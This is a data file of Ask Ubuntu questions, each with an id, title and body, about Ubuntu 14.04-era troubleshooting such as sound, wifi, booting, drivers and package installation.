499764	not able to `` allow executing file as program ''	i know many will think of marking this as duplicate but i have gone through all of the previously answered questions but none are fixing my concern . i have downloaded some tarball and extracted them using the gui and when i try to check the allow executing file as program '' on the executable files inside ... properties of the file say - type : executable ( application/x-executable ) the checkbox gets auomatically unchecked . here 's a screenshot of file permissions . i have given chmod +x on the files too and the drive is ext4 type . what shall i do to enable the check box ? thanks in advance !
499765	no sound in ubuntu 14.04 , again !	i have done almost all the solutions that i could find ! i.e . reinstalling pulse-audio and alsa-base , playing around with alsamixer , etc . but could n't make it work . my audio card is `` integrated : realtek alc269q high definition audio '' . in system setting > sound , i see three drivers : hdmi/display port , speakers , analog output . non of them produce any sound . this is a fresh install of ubuntu 14.04. alsa-info output can be found here . please let me know if you need other logs , info ... p.s . there is another similar unanswered question here .
499766	is an ubuntu cd still available for mail delivery ?	is it still possible to receive via mail a cd copy of ubuntu to use
499767	how do i install ubuntu studio to its own hard drive on a uefi system ?	i have tried this many times over but i ca n't seem to get this to work for my situation . basically , i used to work with linux but now i just use it to edit videos and photos in ubuntu studio . therefore , as it is no longer my primary os , i no longer want to have to use grub to choose which os to boot into . in other words , because i do n't use ubuntu very often it is aggravating to have to choose the os every time i start my system . i have been able to modify grub to where it will boot into windows 8.1 by default and lowered the timer , but the fact that grub starts in the first place is annoying and i know there must be a workaround . right now my workaround is to run it as a virtual machine , but when rendering my youtube videos i 'm just not getting as much processing power and it does n't seem to recognize and therefore properly utilize my graphics card . i would much rather use it as a true os and not a vm . so , on a uefi system , how do i make it to where if i want to load ubuntu studio i just have to choose the hdd it is installed to as the boot device from bios/uefi ? let me know if you need any info i may have accidentally left out
499769	how to uninstall viber completely from ubuntu 14.04 ?	how can i uninstall viber completely from ubuntu 14.04 ? i did not find any option .
499770	how to keep ubuntu 14.04 from asking me for wifi password all the time .	i have a sony vaio flip 15 and ubuntu 14.04 constantly asks me to confirm my wifi about every 10 minutes and it really gets in the way of doing some things . i found other users experiencing the same problem with ubuntu 12 and they were told to go check allow network for all users in wifi security but ubuntu 14 does n't have that option . can anyone tell me what to do ? according to the specs on sony 's website for my laptop my wifi card is intel速 wireless-n 7260 .
499771	remove optional ubuntu packages for speeding up release-upgrade	i have to update ubuntu 13 to ubuntu 14 . when i issued release-upgrade it is showing that about 700 mb data is to be downloaded from internet . i have slow internet connection now . so it will take hours to complete . i believe if i remove some optional packages then it will ignore their updates . hence i can reduce the amount of data downloaded from internet . how can i do it easily ?
499772	network manager ubuntu	i am using ubuntu in virtualbox and not able to setup network connection to host windows7 machine . its showing wired network disconnected . previously it was networkconnection1 .
499778	dual boot ubuntu 14.04 and windows 8.1 issue	i have installed window 8.1 after cleaning my hard disk..and then installed ubuntu 14.04 with the help of ubuntu forum directions.. but after installing both , window 8.1 sometimes start and sometimes not . even if this starts it automatically restarts after sometime . my system does not support uefi . grub is showing both ubuntu and windows .
499779	bluetooth not working in dell inspiron 153521	i got a new dell laptop with ubuntu preinstalled.the problem is that bluetooth is switched on ( light blinking ) but the bluetooth manager always shows device off ? dmesg | grep -i bluetooth [ 13.292441 ] bluetooth : core ver 2.16 [ 13.292470 ] bluetooth : hci device and connection manager initialized [ 13.292473 ] bluetooth : hci socket layer initialized [ 13.292476 ] bluetooth : l2cap socket layer initialized [ 13.292484 ] bluetooth : sco socket layer initialized [ 13.318518 ] bluetooth : generic bluetooth usb driver ver 0.6 [ 13.320944 ] bluetooth : atheros ar30xx firmware driver ver 1.0 [ 13.576707 ] bluetooth : patch file not found ar3k/athrbt_0x31010000.dfu [ 13.576712 ] bluetooth : loading patch file failed [ 13.800545 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 13.800549 ] bluetooth : bnep filters : protocol multicast [ 13.810520 ] bluetooth : rfcomm tty layer initialized [ 13.810527 ] bluetooth : rfcomm socket layer initialized [ 13.810530 ] bluetooth : rfcomm ver 1.11 [ 18558.326340 ] bluetooth : patch file not found ar3k/athrbt_0x31010000.dfu [ 18558.326347 ] bluetooth : loading patch file failed
499783	android device on mtp shows up as `` unnamed device ''	i have a nexus 5 . ubuntu detects and mounts it fine , and i have no problem in transferring files or any other action . however , it does show up as an `` unnamed device '' in some places ( ubuntu 14.04 , both cases ) : nemo ( with gnome shell ) nautilus ( with unity , fresh install ) how do i assign a name to it ? i recall seeing the same behaviour on older versions as well , so i think this is not specific to 14.04 . and it also happens with other devices : ubuntu 13.10. nexus 7 is mounted as an unnamed device
499785	how to install ksymoops on ubuntu 14.04	i want to analyze kernel crash ( oops ) using ksymoops . i am trying to install ksymoops on ubuntu 14.04 ( lts ) 64 bit using command sudo apt-get install ksymoops but unable to install . below mentioned logs after executing command . deepak @ deepak-lpt : ~ $ sudo apt-get install ksymoops reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ksymoops please suggest me how to solve .
499786	download apps from ubuntu software center and run in windows 7	how can i download ubuntu software center on windows 7 . i wanted to download the applications which are in the ubuntu software center and run them on windows 7 . how can i do that ?
499787	ubuntu server autostart	how do i configure the server to restart automatically when the power comes back ( after it has been shut down due to outage of power > ?
499788	net is connected still updater gives error net is not connected	i want to upgrade ubuntu 13.04. net is also connected but still software updater gives error `` failed to download your repository information . check your internet connection . '' why ? ?
499791	audio/video seems to play in a much faster rate in rhythmbox	i have ubuntu 14.04 installed . after successfully update of my plugins , audio/video seems to play in a much faster rate without sound . for example in 1 second , 3 seconds of music are played . and also in youtube in my chromium browser , i wo n't able to play video although buffering starts as usual . ========edited========= now i have installed vlc . here video is perfect but without audio , seems that i am having some driver problem , not sure though.. it might help : http : //www.alsa-project.org/db/ ? f=f51cabaf71d7ff60f4c088295eae81cc96e78da9
499792	how to install a downloaded third party software ( nero linux 3 ) via command line ?	i am a recent convert to ubuntu ( 14.04 ) and still quite a novice . looking for a dvd writing software , and dissatisfied with both brasero and k3b , i downloaded nero linux 4 . this works pretty well except in one respect : it can not do multisession writing . i gathered from the internet that nero linux 3 has no such issue , so i downloaded it . but nero linux 3 requires installation via command line , with which i am all at sea . the instruction that accompanies it says : installation nero linux 3.0.5.1 =============================== open terminal in this folder ============================ become root ( su or sudo depending on your distro ) tar xzvf nerolinux-3.5.1.0.tgz -c / nero this i am unable to execute . i can not even make out what is meant by `` open terminal in this folder/ become root '' etc . i just tried typing sudo apt-get and then pasting the rest in terminal , but this was rejected . i would be immensely grateful if someone could provide a step-by-step how-to-do , preferably with specific reference to the above installation instruction , assuming zero knowledge on my part .
499794	unity greeter wallpaper missing	after following this guide , whenever i use a custom wallpaper ( one that is not from the official wallpapers ) , the background of the login screen shows only purple instead of my wallpaper . however , if i choose an official wallpaper , the login screen background will be displayed correctly ( the wallpaper is shown ) . anyone know how to fix this ? i 'm running ubuntu 14.04 64-bit ( sorry for my bad english
499795	programs not opening ?	i 'm using 14.04 , and i 've recently installed steam , deluge , and chromium , but none of them actually work . when i click on them to open , all i get is a blank header bar which goes away the instant i click on another window , and yet the program is still open . what gives ?
499796	my : rt3290 bluetooth does not work after upgrading to 14.04.01 from 12 were it did work why ?	as i mentioned i had blue tooth capabilities in 12 and it work just fine until i upgraded to day . however when i had installed u 12 it was n't working out of the box then either . i had to use another persons fix and then it worked on mine from then on in 12 .
499800	can i mix sources from different ubuntu versions ?	as we know that we are using repositories for installing packages and repositories configuration file located at /etc/apt/sources.list . i am using ubuntu 12.10 ( quantal quetzal ) which reaches end of life . that means no updates or support . so , the question is , can i use sources.list file from another version , say ubuntu 12.04 lts , and will it negatively affect the system .
499803	making .desktop files - just a few questions	i would like to ask some questions about .desktop files , and figure something out that i think would be rather nifty . i will start by saying i am running [ elementary os luna ] with kernel [ 3.2.0-65-generic-pae ] . i know a little about .desktop files , and what they do . i learned from someone over at the eos irc . one little thing always bugged me about making my own . when you open an application via its .desktop , it will light up that icon in ubuntu , i believe . in eos , we get a little light indicator as well . it stays with the icon itself . when you make your own , it does not . for example , i made a .desktop that attaches to a .sh that would open a .jar . when i click the icon , it does what i would like , and opens . the only thing i dislike is the fact that there is a whole new icon that pops up . it is the oracle java icon , and it is blurry , as well as an eye-sore . i was curious if there is a command i can put in my .desktop that will enable it to only light up the original icon , and such as other apps do . also , i was curious if there was a way to convert things like .png to the file format of .desktops icons . thank you in advanced .
499805	how can i download my ubuntu one data using a powermac g5 , mac os x 10.5.8 ( or a rooted nexus 4 + remote fs )	i need to download my ubuntu one data using a powermac g5 early2005 dp 2.0ghz , mac os x 10.5.8 ( or a rooted nexus 4 8gb with real total storage 5.37gb ) . how should i do that ? thanks in advance , michaĺ krzysztof feiler previously i 've asked on reddit : http : //www.reddit.com/r/ubuntu/comments/2b2vg3/i_need_to_download_my_ubuntu_one_data_using_a/
499807	how to unzip .tgz file from /media directory using terminal ?	i 've downloaded mongodb-linux-x86_64-2.6.3.tgz file using windows 7 and kept it on d : \amra\software\developing soft location . when i right click this .tgz file using ubuntu and see property it shows location : /media/towhid/amra/software/developing soft . now how will i unzip this .tgz file using tar command from terminal ?
499808	installing ubuntu over debian without losing /home data	i am currently running debian testing . i want to install the ubuntu-gnome distribution replacing jessie but keep all my personal files in /home untouched . is it possible to do so if ( i think ) the root and /home live on different partitions on the hdd . if yes , how ?
499811	ubuntu 14.04 libnetwork.so crash for unity control centre	i am new to ubuntu and i am kind of stuck with network . i was having problem with connecting to wifi networks . now the problem was that the network settings show the wifi networks available but when i clicked on connect i never used to get any confirmation for the password to be entered . the wifi network i was trying to connect to have the authentication as wpa and not wep . now i somehow enabled the wifi hotspot from my laptop 's wifi manager but the now the problem is that i am unable to switch the hotspot off . the moment i try to switch off the wifi hotspot the window all settings -- - > network crashes . when i check the syslog i am getting the following ( please note that since the networking on my notebook is not working , hence i am typing the output from my ipad so please pardon the mistaked ) : kernel : unity-control-c [ 4366 ] : segfault at 8 ip ( some no ) sp ( some no ) error 4 in libnetwork.so [ some no ] now the output of my rfkill list wlan is 1 : phy0 : wireless lan soft blocked : no hard blocked : no output for : iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr= 2347 b fragment thr : off power management : off kindly please help me how to resolve the issue and connect to wifi , earlier the wifi was working but i think the problem might have been caused by maybe hibernation
499813	install svn in ubuntu for php	i have an aws instance on which i have installed ubuntu . i am using it primary for php code hosting and i would like to set up svn there . i have seen the tips for installing svn using apt-get but how can i configure in the /var/www/html directory where i host code . currently i am hosting code on beanstalk , but it will allow only one repo for the free tier . i think it is possible to import the code from there .
499814	using accented characters in libre office ( ubuntu character mapping )	i read on the internet that i could set up ubuntu to use characters like á and é by assigning alt gr as the alternative characters key in keyboard settings . it works in nearly all applications . but when i search for a word in libre office - in the search window , the accented character wipes out whatever stands before it . eg if you search for étais - it 's fine - as é comes first . if i type été in the search window - the final é wipes out the ét and i am left with just é . for some reason , libreoffice wants the alternative characters key to overwrite everything else in the search box .
499822	seemingly locked out of ubunutu forums , what is problem ?	when i try to log in the forum just send me to a vbulletin message page which is blank . logged in ok last night . i tried alternate email register but same result .
499824	problem restarting the network service	hello and thanks for reading this , i am working on network configuration , testing a few different approaches to see which one suits me best . i have installed a new instance of 14.04 server and i have only installed the following : openssh-server , samba , smbclient , cifs-utils , ntp and ntpdate . i will obviously need to restart the networking service after changing the configuration . if i use sudo /etc/init.d/networking restart nothing happens , no error message , it simply returns to the command line . if i use sudo service networking restart then i get the following : stop : job failed while stopping start : job is already running : networking if i reboot the machine then it starts with the new network configuration working ( or sometimes not working ! ) as expected . am i taking the correct approach by using either of those commands or is there something else i should do ? perhaps this indicates an issue with my networking service that is a bit beyond me ( for now ) ? thanks in advance for any advice , simon
499826	i have remapped super+l but it still locks my screen instead of doing what i want	i have reassigned my workspace switching keys to super+h , super+j , super+k , and super+l because the arrow keys are too cumbersome . they work perfectly except for super+l which instead just locks my screen . this key combanation is very convenient for me as i do n't need to move either hand from the homerow keys to switch between workspaces . i 'm using 14.04 ( 64bit ) . i reassigned my keys using 'all settings - > keyboard - > shortcuts - > navigation - > switch to workspace x ' .
499828	ubuntu + cinamon - some images are with green tint in explorer . how to solve ?	i have ubuntu 14.04 with cinamon desktop . many images .jpg are showing with green tint . how to solve this problem ?
499829	unable to access hard drive	i am receiving the message shown below when trying to access a hard drive on my pc ! can anyone help me with simple instructions to recover the drive ? thanks you unable to access “datapart1” error mounting /dev/sdb1 at /media/james/datapart1 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/james/datapart1 '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
499832	eucalyptus download and installation on ubuntu 10.04	how to download eucalyptus on ubuntu 10.04 cc ? and after downloading how to check its path ? also how to install it using x editor
499835	how to set ubuntu with cinnamon to hibernate when lid is closed with external monitor ?	if i have external monitor attached , closing lid wo n't hibernate my computer . in normal ubuntu i could edit this in power settings but how could i set set my ubuntu with cinnamon to do this ?
499838	vundle - plugins installed but not loading	i 've installed vundle on my ubuntu box but when i load vim none of the plugins load . my .vimrc from my home directory [ some commented lines edited out ] : runtime ! debian.vim set nocompatible `` be improved , required filetype off `` required '' set the runtime path to include vundle and initialize set rtp+=~/.vim/bundle/vundle.vim '' set rtp+=~/.vim/bundle call vundle # begin ( ) '' alternatively , pass a path where vundle should install plugins '' call vundle # begin ( '~/some/path/here ' ) '' let vundle manage vundle , required plugin 'gmarik/vundle.vim' plugin 'reedes/vim-thematic' plugin 'bling/vim-airline' '' all of your plugins must be added before the following line call vundle # end ( ) `` required filetype plugin indent on `` required '' to ignore plugin indent changes , instead use : '' filetype plugin on '' '' put your non-plugin stuff after this line syntax on set number set ruler '' source a global configuration file if available if filereadable ( `` /etc/vim/vimrc.local '' ) source /etc/vim/vimrc.local endif : pluginlist outputs ... '' my plugins plugin 'gmarik/vundle.vim ' plugin 'reedes/vim-thematic ' plugin 'bling/vim-airline ' i have n't changed any other settings , this is my first attempt at using vim plugins . vim loads looking like this ... ( default vim )
499839	getting error while installing python-kivy packages in ubuntu	i 'm not able to install python-kivy , i got this error : dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 127 processing triggers for libreoffice-common ... errors were encountered while processing : /var/cache/apt/archives/update-manager-core_1 % 3a0.156.14.15_amd64.deb /var/cache/apt/archives/update-manager_1 % 3a0.156.14.15_all.deb /var/cache/apt/archives/python-uno_1 % 3a3.5.7-0ubuntu6.1_amd64.deb /var/cache/apt/archives/python-ubuntuone-client_3.0.2-0ubuntu2.2_all.deb /var/cache/apt/archives/python-libxml2_2.7.8.dfsg-5.1ubuntu4.9_amd64.deb /var/cache/apt/archives/python-lxml_2.3.2-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
499840	14.04 did not install correctly , vmware player	i 'm running ubuntu 64-bit as a virtual machine using vmware player . i was prompted to upgrade from 13.10 to 14.04 . the installation process was taking a while and i put my laptop to sleep . when i brought it back from sleep , the installation seemed to have finished but i was met with an error message saying something along the lines of : ubuntu 14.04 did not install correctly . i have n't had any apparent problems , and appear to be running 14.04 , but i 'm worried the installation is messed up . is there any way i can reinstall it so that i can be comfortable it 's running smoothly ? thanks .
499845	ubiquity appears to hang installing dual boot osx	i am trying to dual-boot osx ( 10.9 mavericks ) and ubuntu 14.04 , and the ubiquity installer has apparently hung for the last 20 minutes . i resized my osx partition using disk utility in osx , and made a fat partition there . then in ubuntu from the live usb i ran the installer . resized this partition a bit ( screenshot ) and confirmed . after that , nothing . there 's a fatal error in the ubiquity-dm log seemingly related to some x session not existing . not entirely sure if this is relevant . ubiquity version 2.18.17 . some log files /var/log/installer/debug ubuntu @ ubuntu : ~ $ tail -f /var/log/installer/debug /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:131 : warning : source id 332438 was not found when attempting to remove it glib.source_remove ( self.rows_changed_id ) /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:18 : warning : source id 346649 was not found when attempting to remove it glib.source_remove ( self.timeout_id ) /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:131 : warning : source id 346742 was not found when attempting to remove it glib.source_remove ( self.rows_changed_id ) /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:18 : warning : source id 347267 was not found when attempting to remove it glib.source_remove ( self.timeout_id ) /usr/lib/ubiquity/ubiquity/frontend/gtk_components/nmwidgets.py:131 : warning : source id 347407 was not found when attempting to remove it glib.source_remove ( self.rows_changed_id ) /var/log/installer/dm ubuntu @ ubuntu : ~ $ tail -f /var/log/installer/dm ( panel:2083 ) : gtk-critical ** : gtk_widget_remove_accelerator : assertion 'gtk_is_accel_group ( accel_group ) ' failed ubiquity-dm : greeter exited with code 0 nm-applet-message : pid 1987 ( we are 2105 ) sent signal 15 , shutting down ... ( process:2086 ) : glib-gobject-critical ** : g_object_unref : assertion 'g_is_object ( object ) ' failed xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 21 requests ( 21 known processed ) with 0 events remaining . ( ee ) server terminated successfully ( 0 ) . closing log file . ubiquity-dm : set_locale ubiquity-dm : exiting with code 0
499847	i can not browse my samba network share	i have a ubuntu server 12.4 lts server running samba . i have folder shared & can be accessible from windows ws . however . recently i added another ubuntu server to the network ( on vw environment ) unfortunately i can not access the samba share from the newly added pc . when i browse the network it shows both the windows network and workgroup network but i can not browse into the workgroup . basically i need to be able to map the samba share on my ubuntu01 server to my new ubopn01 server . any help is much appreciated . thankx
499848	open source radeon driver overscan	i 'm experiencing a fair bit of overscan using the open source radeon drivers on 14.04 . i 'm using a dvi cable to connect a radeon x1300 to a rear projection television . i 've looked through the television 's menu , and ca n't find a way to address the overscan with its settings . i 've done a lot of searches , and i think the following statements are all true . please correct me if i 'm wrong . i 'd be glad to be wrong about this and fix the problem . the open source driver does not have a scaling option . the catalyst control center does , but requires the proprietary drivers to be installed . installing the proprietary drivers causes the system to display nothing on the next boot . is there a way forward ? the end goal is a mythtv installation . i 'm hoping mythtv has a way to scale its display . ( a quick search i 've conducted gives me hope that it does . ) still , it would be great to get the entire desktop visible , as well .
499849	steam blackscreen on lubuntu	i installed steam on lubuntu and after i complete my info to log in , steam updates and then i get a black screen for a few seconds and steam disconnects . how can i solve this ? it looks like a resolution thing to me . this is the hardware : intel pentium 4 cpu 2.40ghz ‖ ram 1508 mib ‖ gigabyte 8ig1000mk ‖ nvidia nv44a geforce 6200 i have n't updated any drivers , but other games run without a problem . this is the respsone after steam crashes : crashid=bp-b9f4d400-9e3b-4011-94cd-8626c2140720
499854	how can i dynamically add a widget that i can then fetch with a gtk.builder instance ?	if i want to dynamically add a row to a vbox and populate it ... i need a way to see if that row already exists . so the thought train is `` try to fetch the box with builder instance . if it fails , add a row and add the box '' if i add the box dynamically , what flags do i have to set or what calls do i have to make in order to be able to fetch it with builder ?
499855	who should own /var/log and /var/tmp	i was playing around with some scripts i have written and i might have changed their owner to root , though i am not sure . who should be the owner of these folders ?
499856	ubuntu 14.04 - automatically mount usb drive without clicking on it manually ?	running ubuntu 14.04 on my intel nuc and using it right now as a htpc , running xbmc . when i insert a usb drive , ubuntu recognizes it and shows the drive in nautilus , in the panel on the left . but the usb drive is not automatically mounted , i have to specifically click on the usb device in nautilus and then it mounts and shows me the contents . but when i 'm using it as my htpc with xbmc , this gets annoying because then i need to close out of xbmc , mount the drive by clicking on it and restart xbmc . any setting that i need to alter so usb drives are not only recognized , but also mounted automatically ?
499860	how do i install ap-hotspot in ubuntu 14.04 ?	when i enter the command : sudo add-apt-repository ppa : nilarimogard/webupd8 it gives this message '' can not add ppa : 'ppa '' nilarimogard/webupd8' please check that the ppa name and format is correct '' how do i proceed ?
499863	newbie question on what the various cool names like utopic unicorn	what do these cool names of releases tell me about the release ? which release is appropriate to install on virtualbox on mac ( 10.9.4 )
499866	slow booting ubuntu 14.04	i am currently using ubuntu 14.04 & facing the problem that it is taking much time to boot , so i installed bootchart to see which process is taking much time but could not understand the chart .png image file , so here i am attaching the bootchart image file : i am using ubuntu only ( no dual boot ) & my hardware config is : memory 4gb , processor intel core i3-3110m 4 cpu @ 2.40ghz graphics intel ivybridge mobile os type 64-bit ssd 500 gb can anybody instruct me how to analyse the bootchart & disable the unnecessary processes which is responsible for slow booting .
499868	problem with `sudo airmon-ng start wlan0`	i have ubuntu 14.04 on macbook pro . i 've tried to run : sudo airmon-ng start wlan0 then the result was : found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 899 avahi-daemon 904 avahi-daemon 978 networkmanager 1298 wpa_supplicant 4408 dhclient process with pid 4408 ( dhclient ) is running on interface wlan0 interface chipset driver wlan0 **unknown** wl - [ phy0 ] mon0 : error while getting interface flags : no such device ( monitor mode enabled on mon0 )
499869	mouse is not responding on the desktop	i have just installed variety and some programs one ubunto 14.04 and the mouse stopped working on the background.it does not respond for right and left click .i removed variety but the problem did n't solved .
499870	is there a similar application to `` google authenticator app '' for ubuntu ?	i have enabled two step verification on my dropbox , facebook and google accounts and i had google authenticator installed on my mobile phone , in order to be able to log in my accounts . however , now my mobile phone has a problem , and i can not use that on my mobile . is there any similar app that can be installed on ubuntu and do the same job ?
499871	is there ubuntu 's analogue of snapshot.debian.org ?	debian users have a kind of `` wayback machine '' : snapshot.debian.org , which is really great . there are regressions sometimes , and if i do n't have local deb package with old version , i 'm getting sad sometimes . having a wayback machine like this is very helpful . i ca n't find analogue of it for ubuntu . have i missed it ?
499872	how do i use my home internet connection as vpn at work ?	i need to access my home internet connection from work time to time . my work and home connections are in same network . as i stated in the question both computers use different operation systems ( work win 8.1 home ubuntu ) . i read somewhere you can use one of your machines as vpn if both are under windows os . i 'm asking is there any way to using this as in my situation . short version ; i want to use my home ( ubuntu 12.04 ) as vpn at my work ( win 8.1 ) , how can i do that ? i guess there is an answer to my question but i did not understand that : http : //askubuntu.com/a/280320/126472 ps : all of my connections are lan , not wireless .
499873	ca n't change cursor theme	i ca n't change my cursor theme . i downloaded and installed comixcursor , i have all themes listed in unity tweak tool , but when i select a comix cursor , do n't happen anything . also , when i changed it for redglass the mouse changed , but only if i was pointing in a firefox button/page , very strange . someone knows what this can be ? thank you .
499874	completely uninstall steam and all steam games	will sudo apt-get purge steam completely remove steam and all the games installed with it ? is there anything else that i have to remove or run to achieve this ?
499876	add calling and sms to vodafone dongle k3772	i have a vodafone 3g dongle which i use to connect to internet on my ubuntu 12.04 laptop . all is working fine . now i want to add sms and call facility to this device so that i could make calls directly from my laptop or send sms and receive the same . i works fine in windows with latest mobile partner application from huawei . how it can be done on ubuntu ? also if you will be suggesting gammu or wammu , please help me with the steps involved , as i tried this but nothing happened..
499878	problem with skype installation	i am using ubuntu 12.04 lts . while installing skype an error message is shown as can not install libqtgui4 : i386 i am using linux for the first time . kindly help
499881	ca n't connect to any wi-fi on asus x550c in ubuntu 14.04	i did a clean install of ubuntu 14.04 the first and the only os on my new laptop asus x550c and i can not connect to any wi-fi , even toggling fn+f2 ( keyboard default ) does n't swith/show wi-fi indicator on . here are some outputs from my system : lspci -nnk | grep -ia2 net 03:00.0 network controller [ 0280 ] : qualcomm atheros ar9485 wireless network adapter [ 168c:0032 ] ( rev 01 ) subsystem : azurewave device [ 1a3b:2c97 ] kernel driver in use : ath9k 04:00.2 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 0a ) subsystem : asustek computer inc. device [ 1043:200f ] kernel driver in use : r8169 iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . edit sudo rfkill list all 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no 2 : asus-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : yes lsmod module size used by bbswitch 13615 0 bnep 18895 2 rfcomm 53664 0 binfmt_misc 13140 1 uvcvideo 71309 0 intel_rapl 18301 0 videobuf2_vmalloc 13048 1 uvcvideo videobuf2_memops 13170 1 videobuf2_vmalloc videobuf2_core 39258 1 uvcvideo arc4 12536 2 x86_pkg_temp_thermal 13845 0 intel_powerclamp 14239 0 nvidia 9648068 35 coretemp 13195 0 ath9k 144602 0 snd_hda_codec_hdmi 45342 1 snd_hda_codec_realtek 55125 1 ath9k_common 13359 1 ath9k kvm_intel 132549 0 videodev 108503 2 uvcvideo , videobuf2_core i915 705659 2 ath9k_hw 438205 2 ath9k_common , ath9k snd_hda_intel 42730 3 kvm 388083 1 kvm_intel snd_hda_codec 164067 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel asus_nb_wmi 16862 0 asus_wmi 23495 1 asus_nb_wmi sparse_keymap 13708 1 asus_wmi mxm_wmi 12893 0 ath 23922 3 ath9k_common , ath9k , ath9k_hw drm_kms_helper 47182 1 i915 mac80211 546051 1 ath9k rtsx_pci_ms 17807 0 ath3k 13110 0 btusb 27580 0 cfg80211 409394 3 ath , ath9k , mac80211 crc32_pclmul 12967 0 snd_hwdep 13272 1 snd_hda_codec snd_pcm 85501 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel i2c_algo_bit 13197 1 i915 memstick 16174 1 rtsx_pci_ms snd_page_alloc 14230 2 snd_pcm , snd_hda_intel snd_seq_midi 13132 0 snd_seq_midi_event 14475 1 snd_seq_midi joydev 17101 0 snd_rawmidi 25135 1 snd_seq_midi mei_me 14099 0 snd_seq 55383 2 snd_seq_midi_event , snd_seq_midi bluetooth 342206 12 bnep , ath3k , btusb , rfcomm serio_raw 13230 0 drm 244037 5 i915 , drm_kms_helper , nvidia mei 66737 1 mei_me snd_seq_device 14137 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 28584 2 snd_pcm , snd_seq mac_hid 13037 0 lpc_ich 16864 0 snd 60871 17 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi soundcore 12600 1 snd wmi 18673 2 mxm_wmi , asus_wmi video 18903 2 i915 , asus_wmi parport_pc 31981 0 ppdev 17391 0 lp 13299 0 parport 40836 3 lp , ppdev , parport_pc hid_generic 12492 0 usbhid 46997 0 hid 87604 2 hid_generic , usbhid rtsx_pci_sdmmc 22693 0 ahci 25579 3 r8169 61562 0 psmouse 91329 0 libahci 27082 1 ahci mii 13654 1 r8169 rtsx_pci 43796 2 rtsx_pci_ms , rtsx_pci_sdmmc
499883	software only partially updated on ubuntu 14.04	i have found on my system ( ubuntu 14.04 lts 64bit ) , that when there are software updates , not all are considered by the `` update manager '' system . i mean that , for instance , there are 10 packages to update , but in the `` update manager '' window only 7 are listed . it seems that some updates are ignored , and i do n't understand why . if i use synaptic , i can see that there are still some updates to apply , but the `` update manager '' system continues to ignore them , even after a couple of weeks . one time , i have applied all the updates with synaptic , but after some time there was again some updates ignored by the `` update manager '' system . someone has any clue about this `` strange '' behavior ? ( i 'm sorry for my bad english )
499889	no touchpad and cursor issues in ubuntu 14.04	so i just got ubuntu and even when running the live disk i had an issue where i could n't click most of the time and the mouse would jump left every 3 seconds i thought once i got installed and updated it would be fine . now i can click fine but it still jumps and the touchpad does n't work at all . i have an asus laptop with touchscreen ( which works perfectly ) and a logitech g300 mouse . after some searching i figured out how to do basic stuff with xinput and when i did an xinput list command i got this : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech gaming mouse g300 id=10 [ slave pointer ( 2 ) ] ⎜ ↳ usbest technology sis hid touch controller id=13 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 logitech wheel mouse id=16 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ logitech gaming mouse g300 id=11 [ slave keyboard ( 3 ) ] ↳ usb2.0 uvc hd webcam id=12 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=14 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=15 [ slave keyboard ( 3 ) ] instantly noticed that i do n't have a ps/2 mouse so no idea why but it does n't detect my touchpad and has added a duplicate generic device for my usb mouse . if i disable id 16 then everything is golden until i restart and have to repeat the command . how can i fix this up so i can get my touchpad working and the duplicate mouse removed permanently ? thank you edit 1 : after further attempts i have found that sudo modprobe -r psmouse sudo modprobe psmouse proto=imps also stops the cursor jumping and removes the generic mouse device ( id=16 ) but i just found if i then touch the touchpad things get hectic and keyboard stops working properly and mouse clicking does n't work . are there no drivers for the touchpad asus uses or something ?
499890	ignoring file 'google.list’ ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension	when i do `` sudo apt-get update '' following output is generated at the end : - n : ignoring file 'google.list’ ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension any solution for this ? ? ? ?
